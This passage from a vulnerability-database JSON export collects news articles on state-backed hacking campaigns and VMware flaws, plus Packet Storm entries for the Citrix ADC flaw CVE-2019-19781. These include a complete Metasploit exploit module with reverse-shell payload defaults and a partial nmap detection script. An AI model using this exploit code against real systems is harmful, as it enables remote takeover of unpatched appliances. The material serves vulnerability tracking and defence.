([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n\n\n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. \n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "modified": "2020-09-15T09:14:30", "published": "2020-09-15T09:14:00", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T08:30:19", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "description": "[](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\n[](<https://go.thn.li/1-300-6> \"password auditor\" )\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\n[](<https://go.thn.li/2-728-6> \"password auditor\" )\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value accounts and assets.\n\n[](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), and the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).\n\n[](<https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway \n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-04-16T06:47:10", "published": "2021-04-15T16:55:00", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-28T08:46:39", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "description": "[](<https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\n[](<https://go.thn.li/1-300-5> \"password auditor\" )\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agency noted.\n\n[](<https://go.thn.li/2-728-5> \"password auditor\" )\n\nAmong some of the other tactics put to use by APT29 are password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying a Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). Also in the mix is the practice of obtaining virtual private servers via false identities and cryptocurrencies, and relying on temporary VoIP telephone numbers and email accounts by making use of an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-04-28T06:42:30", "published": "2021-04-27T09:14:00", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-25T05:32:07", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781", "CVE-2020-3992", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974", "CVE-2021-21976"], "description": "[](<https://thehackernews.com/images/-M_1KgL6tAuQ/YDYE-aJuyBI/AAAAAAAAB38/asAWmk7ZJscXPGS_gHJudw0GOAZrcEX7wCLcBGAsYHQ/s0/vmware.jpg>)\n\nVMware has addressed multiple critical remote code execution (RCE) vulnerabilities in VMware ESXi and vSphere Client virtual infrastructure management platform that may allow attackers to execute arbitrary commands and take control of affected systems.\n\n\"A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,\" the company [said](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) in its advisory.\n\nThe vulnerability, tracked as CVE-2021-21972, has a CVSS score of 9.8 out of a maximum of 10, making it critical in severity.\n\n\"In our opinion, the RCE vulnerability in the vCenter Server can pose no less a threat than the infamous vulnerability in Citrix (CVE-2019-19781),\" said Positive Technologies' Mikhail Klyuchnikov, who discovered and reported the flaw to VMware.\n\n\"The error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server.\"\n\nWith this access in place, the attacker can then successfully move through the corporate network and gain access to the data stored in the vulnerable system, such as information about virtual machines and system users, [Klyuchnikov noted](<https://swarm.ptsecurity.com/unauth-rce-vmware/>).\n\nSeparately, a second vulnerability (CVE-2021-21973, CVSS score 5.3) allows unauthorized users to send POST requests, permitting an adversary to mount further attacks, including the ability to scan the company's internal network and retrieve specifics about the open ports of various services.\n\nThe information disclosure issue, according to VMware, stems from an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in the vCenter Server plugin.\n\n[](<https://thehackernews.com/images/-ptRHS90VS-M/YDaOLCFCy0I/AAAAAAAA3oU/eE4iu9IU3WI1xoEKlX6eypn5wcFlZWhwQCLcBGAsYHQ/s0/command.jpg>)\n\nVMware has also provided workarounds to remediate CVE-2021-21972 and CVE-2021-21973 temporarily until the updates can be deployed. Detailed steps can be found [here](<https://kb.vmware.com/s/article/82374>).\n\nIt's worth noting that VMware rectified a command injection vulnerability in its vSphere Replication product ([CVE-2021-21976](<https://www.vmware.com/security/advisories/VMSA-2021-0001.html>), CVSS score 7.2) earlier this month that could grant a bad actor with administrative privileges to execute shell commands and achieve RCE.\n\nLastly, VMware also resolved a heap-overflow bug (CVE-2021-21974, CVSS score 8.8) in ESXi's service location protocol (SLP), potentially allowing an attacker on the same network to send malicious SLP requests to an ESXi device and take control of it.\n\n[OpenSLP](<https://www.openslp.org/doc/html/IntroductionToSLP/index.html>) provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks.\n\nThe latest fix for ESXi OpenSLP comes on the heels of a similar patch ([CVE-2020-3992](<https://www.vmware.com/security/advisories/VMSA-2020-0023.html>)) last November that could be leveraged to trigger a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) in the OpenSLP service, leading to remote code execution.\n\nNot long after, reports of active exploitation attempts emerged in the wild, with ransomware gangs [abusing](<https://twitter.com/GossiTheDog/status/1324896051128635392>) the vulnerability to take over unpatched virtual machines deployed in enterprise environments and encrypt their virtual hard drives.\n\nIt's highly recommended that users install the updates to eliminate the risk associated with the flaws, in addition to \"removing vCenter Server interfaces from the perimeter of organizations, if they are there, and allocate them to a separate VLAN with a limited access list in the internal network.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-02-24T17:35:31", "published": "2021-02-24T07:54:00", "id": "THN:87AE96960D76D6C84D9CF86C2DDB837C", "href": "https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html", "type": "thn", "title": "Critical RCE Flaws Affect VMware ESXi and vSphere Client \u2014 Patch Now", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-11T08:24:43", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-21972", "CVE-2021-26855"], "description": "[](<https://thehackernews.com/images/-W51kRhVBeW0/YJaCznsmgiI/AAAAAAAACfU/z7fgy604zAcZllL9m6sPApy3bUHHX9YEQCLcBGAsYHQ/s0/hacker.jpg>)\n\nCyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous [public disclosures](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) of their attack methods, according to a [new advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>) jointly published by intelligence agencies from the U.K. and U.S. Friday.\n\n\"SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders,\" the National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>).\n\nThese include the deployment of an open-source tool called [Sliver](<https://github.com/BishopFox/sliver>) to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities.\n\n[](<https://go.thn.li/1-728-4> \"password auditor\" )\n\nThe development follows the [public attribution](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) of SVR-linked actors to the [SolarWinds](<https://thehackernews.com/2021/04/researchers-find-additional.html>) supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.\n\nThe attribution was also accompanied by a technical report detailing five vulnerabilities that the SVR's APT29 group was using as initial access points to infiltrate U.S. and foreign entities.\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway\n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\n\"The SVR targets organisations that align with Russian foreign intelligence interests, including governmental, think-tank, policy and energy targets, as well as more time bound targeting, for example [COVID-19 vaccine](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>) targeting in 2020,\" the NCSC said.\n\nThis was followed by a separate guidance on April 26 that [shed more light](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) on the techniques used by the group to orchestrate intrusions, counting password spraying, exploiting zero-day flaws against virtual private network appliances (e.g., CVE-2019-19781) to obtain network access, and deploying a Golang malware called WELLMESS to plunder intellectual property from multiple organizations involved in COVID-19 vaccine development.\n\nNow according to the NCSC, seven more vulnerabilities have been added into the mix, while noting that APT29 is likely to \"rapidly\" weaponize recently released public vulnerabilities that could enable initial access to their targets.\n\n * [**CVE-2019-1653**](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) \\- Cisco Small Business RV320 and RV325 Routers\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) \\- Oracle WebLogic Server\n * [**CVE-2019-7609**](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) \\- Kibana\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) \\- F5 Big-IP\n * [**CVE-2020-14882**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) \\- Oracle WebLogic Server\n * [**CVE-2021-21972**](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) \\- VMware vSphere\n * [**CVE-2021-26855**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) \\- Microsoft Exchange Server\n\n\"Network defenders should ensure that security patches are applied promptly following CVE announcements for products they manage,\" the agency said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-05-11T06:23:38", "published": "2021-05-08T12:24:00", "id": "THN:1ED1BB1B7B192353E154FB0B02F314F4", "href": "https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html", "type": "thn", "title": "Top 12 Security Flaws Russian Spy Hackers Are Exploiting in the Wild", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-01-14T23:23:57", "description": "", "published": "2020-01-14T00:00:00", "type": "packetstorm", "title": "Citrix ADC (NetScaler) Directory Traversal / Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-14T00:00:00", "id": "PACKETSTORM:155947", "href": "https://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE', \n'Description' => %q{ \nThis module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka \nNetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload. \n}, \n'Author' => [ \n'Project Zero India', 'TrustedSec', # PoCs \n'mekhalleh (RAMELLA S\u00e9bastien)' # Module (https://www.pirates.re/) \n], \n'References' => [ \n['CVE', '2019-19781'], \n['EDB', '47901'], \n['EDB', '47902'], \n['URL', 'https://support.citrix.com/article/CTX267027/'], \n['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'] \n], \n'DisclosureDate' => '2019-12-17', \n'License' => MSF_LICENSE, \n'Platform' => ['python', 'unix'], \n'Arch' => [ARCH_PYTHON, ARCH_CMD], \n'Privileged' => false, \n'Targets' => [ \n['Python', \n'Platform' => 'python', \n'Arch' => ARCH_PYTHON, \n'Type' => :python, \n'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'} \n], \n['Unix Command', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_command, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal', \n'HttpClientTimeout' => 3.5 \n}, \n'Notes' => { \n'AKA' => ['Shitrix'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \nend \n \ndef cmd_unix_generic? \ndatastore['PAYLOAD'] == 'cmd/unix/generic' \nend \n \ndef exploit \nunless datastore['ForceExploit'] \ncase check \nwhen CheckCode::Vulnerable \nprint_good('The target appears to be vulnerable') \nwhen CheckCode::Safe \nfail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable') \nelse \nfail_with(Failure::Unknown, 'The target vulnerability state is unknown') \nend \nend \n \nprint_status(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\") \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \ncase target['Type'] \nwhen :python \nexecute_command(%(/var/python/bin/python2 -c \"#{payload.encoded}\")) \nwhen :unix_command \nif (res = execute_command(payload.encoded)) && cmd_unix_generic? \nprint_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, '')) \nend \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nfilename = rand_text_alpha(8..42) \nnonce = rand_text_alpha(8..42) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'), \n'headers' => { \n'NSC_USER' => \"../../../netscaler/portal/templates/#{filename}\", \n'NSC_NONCE' => nonce \n}, \n'vars_post' => { \n'url' => rand_text_alpha(8..42), \n'title' => \"[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]\" \n} \n) \n \nunless res && res.code == 200 \nprint_error('No response to POST newbm.pl request') \nreturn \nend \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, \"/vpn/../vpns/portal/#{filename}.xml\"), \n'headers' => { \n'NSC_USER' => rand_text_alpha(8..42), \n'NSC_NONCE' => nonce \n}, \n'partial' => true \n) \n \nunless res && res.code == 200 \nprint_warning(\"No response to GET #{filename}.xml request\") \nend \n \nregister_files_for_cleanup( \n\"/netscaler/portal/templates/#{filename}.xml\", \n\"/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2\" \n) \n \nres \nend \n \ndef chr_payload(cmd) \ncmd.each_char.map { |c| \"chr(#{c.ord})\" }.join('.') \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155947/citrix_dir_traversal_rce.rb.txt"}, {"lastseen": "2020-01-16T22:49:44", "description": "", "published": "2020-01-16T00:00:00", "type": "packetstorm", "title": "Citrix ADC / Gateway Path Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "PACKETSTORM:155972", "href": "https://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html", "sourceData": "`# Exploit Title: Path Traversal in Citrix Application Delivery Controller \n(ADC) and Gateway. \n# Date: 17-12-2019 \n# CVE: CVE-2019-19781 \n# Vulenrability: Path Traversal \n# Vulnerablity Discovery: Mikhail Klyuchnikov \n# Exploit Author: Dhiraj Mishra \n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0 \n# Vendor Homepage: https://www.citrix.com/ \n# References: https://support.citrix.com/article/CTX267027 \n# https://github.com/nmap/nmap/pull/1893 \n \nlocal http = require \"http\" \nlocal stdnse = require \"stdnse\" \nlocal shortport = require \"shortport\" \nlocal table = require \"table\" \nlocal string = require \"string\" \nlocal vulns = require \"vulns\" \nlocal nmap = require \"nmap\" \nlocal io = require \"io\" \n \ndescription = [[ \nThis NSE script checks whether the traget server is vulnerable to \nCVE-2019-19781 \n]] \n--- \n-- @usage \n-- nmap --script https-citrix-path-traversal -p <port> <host> \n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args \noutput='file.txt' \n-- @output \n-- PORT STATE SERVICE \n-- 443/tcp open http \n-- | CVE-2019-19781: \n-- | Host is vulnerable to CVE-2019-19781 \n-- @changelog \n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj) \n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__) \n-- @xmloutput \n-- <table key=\"NMAP-1\"> \n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem> \n-- <elem key=\"state\">VULNERABLE</elem> \n-- <table key=\"description\"> \n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5, \n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path \n-- traversal vulnerability that allows attackers to read configurations or \nany other file. \n-- </table> \n-- <table key=\"dates\"> \n-- <table key=\"disclosure\"> \n-- <elem key=\"year\">2019</elem> \n-- <elem key=\"day\">17</elem> \n-- <elem key=\"month\">12</elem> \n-- </table> \n-- </table> \n-- <elem key=\"disclosure\">17-12-2019</elem> \n-- <table key=\"extra_info\"> \n-- </table> \n-- <table key=\"refs\"> \n-- <elem>https://support.citrix.com/article/CTX267027</elem> \n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem> \n-- </table> 